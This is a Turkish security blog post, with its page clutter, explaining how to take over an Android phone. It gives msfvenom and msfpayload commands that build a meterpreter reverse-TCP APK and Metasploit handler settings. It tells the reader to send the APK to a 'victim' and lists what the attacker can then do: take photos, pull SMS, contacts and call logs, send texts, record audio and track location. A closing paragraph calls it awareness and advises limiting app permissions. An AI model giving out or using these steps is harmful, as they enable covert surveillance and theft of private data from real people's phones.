$type=blogging$count=16$readmore=no$labels=no$snippet=no$meta=no

$type=one$count=10 $type=blogging$count=16$readmore=no$labels=no$snippet=no$meta=no Yazılarımız DMCA lisansı ile korunmaktadır.Kaynak gösterilmeden alıntı yapılamaz.!

Takdir Ediliyorsan Değil Taklit Ediliyorsan Başarmışsındır.
Bumerang - Yazarkafe

DMCA.com Protection Status

Android Hacking Nasıl Yapılır?





Merhaba Değerli Takipçilerim,

Bu yazımda Android sistemlerin nasıl hacklenebildiğini, hacklendikten sonra neler yapılabilindiğini ve son olarak karşılaşabileceğiniz olası durumlardan bahsedeceğim.

Aşağıda bahsetmiş olduğum uygulama adımlarını Unix, Linux veya Windows sistemler üzerinden gerçekleştirebilirsiniz. Ben işlem adımlarımı Kali Linux üzerinen gerçekleştiriyor olucam. Adım adım ilerleyerek android sisteme sızmaya çalışalım...

Adım 1:

Öncelikle sızmak istediğimiz telefon için bir tane apk uzantılı payload oluşturmamız ve 4444 portunu kullanmış olduğumuz işletim sisteminde aktif hale getirmemiz gerekiyor.
Haydi oluşturalım...


  • msfpayload android/meterpreter/reverse_tcp LHOST=<Local Ip Adresiniz> LPORT=4444 R > TestUygulamasi.apk
ya da
  • msfvenom -p android/meterpreter/reverse_tcp LHOST=<Local Ip Adresiniz>  LPORT=4444 R > TestUygulamasi.apk

komut satırlarını yazarak payloadımız olacak olan apk dosyasını üretebilirsiniz. 



Apk dosyasını oluşturduktan ve 4444 portunu açtıktan sonra sonra ikinci adıma geçebiliriz.

Adım 2:

Komut satırımıza msfconsole yazarak Metasploit aracını çalıştıralım.


Adım 3:


  • Metasploit çalıştıktan sonra multi-handler exploitini yükleyerek işlemlerimize devam edebiliriz. multi-handler exploit: use exploit/multi/handler
  • Ardından payload tipini seçerek payloadımızı ayarlayalım. Android payload: set payload android/meterpreter/reverse_tcp
  • Daha sonra host ve port ayarları yapılarak işleme devam edilir. Host: set LHOST  ip adresiniz  Port: set LPORT 4444 


Adım 4:

Oluşturmuş olduğumuz apk dosyasını ele geçirilmek istenilen kişininin telefonuna gönderilir ve ardından komut satırına exploit yazılarak kurbanın uygulamayı yüklemesi beklenir.



Kurban, apk dosyasını kurduktan itibaren artık mevcut telefon üzerinde istediğiniz şekilde işlem yapabilirsiniz. Erişim sağlanan telefon üzerinde ne tür işlemler yapabileceğinize help yazarak ulaşabilirsiniz.

Kullanılabilinen özellikler listesi şu şekildedir;





Hemen hemen tüm özelliklere baktım ve sizlerle en çok dikkat çeken birkaç özelliği paylaşmak istiyorum.

Kendi bilgisayarınız üzerinden sızmış olduğunuz telefonun;
  • Kamerasıyla bulunulan ortamın fotoğrafını çekebilirsiniz, 
  • Telefonda var olan tüm sms kayıtlarını çekebilirsiniz,
  • Bilgisayarınız üzerinden komut satırı ile istediğiniz numaraya kurbanın telefonundan sms gönderebilirsiniz,
  • Telefonda var olan tüm rehber kayıtlarını çekebilirsiniz,
  • Telefonda var olan tüm arama kayıtlarını çekebilirsiniz,
  • Telefon rootlu ise kök dizininde yer alan veri tabanı dosyalarını çekebilirsiniz,
  • Telefonun bulunduğu ortamı ses kaydına alabilirsiniz.
  • Telefonun o anki konumuna erişme imkanı, o an kullanmış olduğu ip bilgisi, telefonun ekran görüntüsü yani kısaca aklınıza gelen hemen hemen herşeyi uzaktan yapabiliyorsunuz.

Kullanımına ilişkin örnek ekran görüntüsü:


örnekteki gibi istediğiniz özelliğin ismini yazarak sonuna -h parametresini eklediğinizde özelliğin nasıl kullanıldığını size gösterecektir.


Ne kadar da korkunç değil mi böyle düşününce ? Ama farkında mısınız bilmiyorum ama şuan telefonunuzda kurulu olan hemen hemen her uygulama kurulurken sizden istediği izinler ile bunları maalesef yapabiliyor ve yapmıştırda.


Bazılarınız belki şunu sorabilirler, 

- eee biz uygulamayı ona göndereceksek ve o kuracaksa bunun neresi hackleme diye ?

+ Evet haklısınız ama şununda farkında olmanız gerekiyor bu yazımıdaki temel amaç farkındalık yaratmaktı. Bugün milyonlarca uygulama google play üzerinden veya herhangi uygulama sağlayıcıları sayesinde indirilip telefonlara kuruluyor ama çok az insan bu uygulamaların istemiş olduğu izinlerin farkında. Yani demem o ki zaten birileri bizlere bunları popüler uygulamalar ile çoktan enjekte etmiş durumdalar. 

Her ne kadar dünya çapında kendini ispatlamış popüler mobil uygulamalar da olsa bana göre hiçbir uygulama güvenli olmamakla birlikte tüm mahrem bilgileriniz az önce göstermiş olduğum mantık ve daha ileri bir teknoloji ile zaten elde etmiş durumdalar.

Daha güvenli bir mobil kullanım için gerekmedikçe uygulama izinlerimizi kapalı tutalım ve her uygulamayı telefonumuza indirmeyelim.

Okuduğunuz için teşekkür eder, iyi günler dilerim. :)






YORUMLAR⤵

Ad

adli bilişim adli bilişim eğitimi Adli Bilişim İncelemelerinde Foremost ile Veri Kazıma İşlemi adli bilişim Malware adli bilişim mühendisi adlibilisim Android Hacking android hackleme android injection Android ve IOS İşletim Sistemlerinin Veritabanları ve Görevleri Nelerdir? cobalt strike analizi cobalt strike detect cobalt strike saldırısı cobalt strike tespiti defender bypass digital forensic DumpIt DumpIt ile ram imajı alma dumpit indir foremost How detect Jigsaw Ransomware Malware ibrahim baloglu ibrahim baloğlu image live imaj canlandırma java JAVA ile Rss Üzerinden Veri Çekme Jigsaw Ransomware Malware jsoup kurulumu jsoup rss kodlama linux veri kurtarma live image malware Malware tespiti metasploit android hacking metasploit nedir mobil uygulamaların adli bilişim incelemesi Yaani Mail Uygulamasının Adli Bilişim Açısından İncelenmesi NTUSER.DAR ptt mesaj uygulaması ptt mesenger ptt mesenger indir ptt mesenger nedir ptt messenger purple team saldırısı ram ram imajı alma ram imajı nedir registry forensic registry parse rss veri çekme SAM sibergüvenlik SOFTWARE SYSTEM veri kurtarma volatility volatility ile ram inceleme volatility kullanımı volatility ram imajı windows forensic windows forensic eğitimi Windows şifresi elde etme yaani mail yaani mail adli bilişim incelemesi yani mail nedir yeni
false
ltr
item
İbrahim BALOĞLU | Adli Bilişim | Siber Güvenlik: Android Hacking Nasıl Yapılır?
Android Hacking Nasıl Yapılır?
https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEiIiLdyVtWVcYLvoeDk7dfbvtOcjKvQsi6uOf3ytgW5Jw4cL9iX_dRxhKCdFG8u2yzc0uv_y5SxdbS39RWMKN1vmEBE8lWjY4YyKiJ9gUvI3QW_wDtHyzs57zI8ZCCSJoOWE2TL6se30zAL/s640/androidhacking.jpg
https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEiIiLdyVtWVcYLvoeDk7dfbvtOcjKvQsi6uOf3ytgW5Jw4cL9iX_dRxhKCdFG8u2yzc0uv_y5SxdbS39RWMKN1vmEBE8lWjY4YyKiJ9gUvI3QW_wDtHyzs57zI8ZCCSJoOWE2TL6se30zAL/s72-c/androidhacking.jpg
İbrahim BALOĞLU | Adli Bilişim | Siber Güvenlik
https://www.ibrahimbaloglu.com/2018/05/android-hacking.html
https://www.ibrahimbaloglu.com/
https://www.ibrahimbaloglu.com/
https://www.ibrahimbaloglu.com/2018/05/android-hacking.html
true
631381070093278817
UTF-8
Konu Bulunamadı. Tümünü Gör Devamını Oku Yanıtla Yanıtlamaktan Vazgeç Sil Yazar Ana Sayfa Sayfa Yazılar Tümünü Gör Size Özel Başka Önerilerimiz⤵ Etiket Arşiv ARANAN Aradığınız kelimeyle alakalı henüz bir konumuz yok :( Ana Sayfa Pazar Pazartesi Salı Çarşamba Perşembe Cuma Cumartesi Sun Mon Tue Wed Thu Fri Sat Ocak Şubat Mart Nisan Mayıs Haziran Temmuz Ağustos Eylül Ekim Kasım Aralık Ocak Şubat Mart Nisan Mayıs Haziran Temmuz Ağustos Eylül Ekim Kasım Aralık Şimdi 1 dk. önce $$1$$ dk önce 1 saat önce $$1$$ saat önce Dün $$1$$ gün önce $$1$$ hafta önce 5 haftadan önce